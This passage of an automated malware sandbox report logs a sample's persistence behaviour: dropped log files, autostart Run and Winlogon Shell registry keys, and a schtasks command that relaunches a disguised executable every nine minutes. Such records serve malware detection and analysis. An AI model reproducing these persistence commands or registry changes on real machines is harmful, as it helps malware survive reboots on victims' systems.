Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\vIyiJTTD.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\lZeSZrOV.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\dwWdpxyo.log	Jump to dropped file
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File created: C:\Users\user\Desktop\SIrnFmDG.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\KAZQIQEM.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\sfNsKLIr.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\TnEFcwnq.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\hJqUpVHL.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\QCZpVjcx.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\GTFZlGXP.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\oGeTRkCA.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\cNoChqRS.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\CXEIeahW.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\spksuybo.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\bhUNaLwZ.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\JVsHHpbK.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\WmSvTfGg.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\NDzgjDBy.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\vwiBQQWj.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\bZkuwcVU.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\RrReMzQm.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\BpLaswaY.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\zepZsevX.log	Jump to dropped file
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File created: C:\Users\user\Desktop\iXYuZrQJ.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\hyperComponentFontDhcp\Mscommon.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz			Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\hyperComponentFontDhcp\Mscommon.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f

Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz	Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Process information set: NOOPENFILEERRORBOX
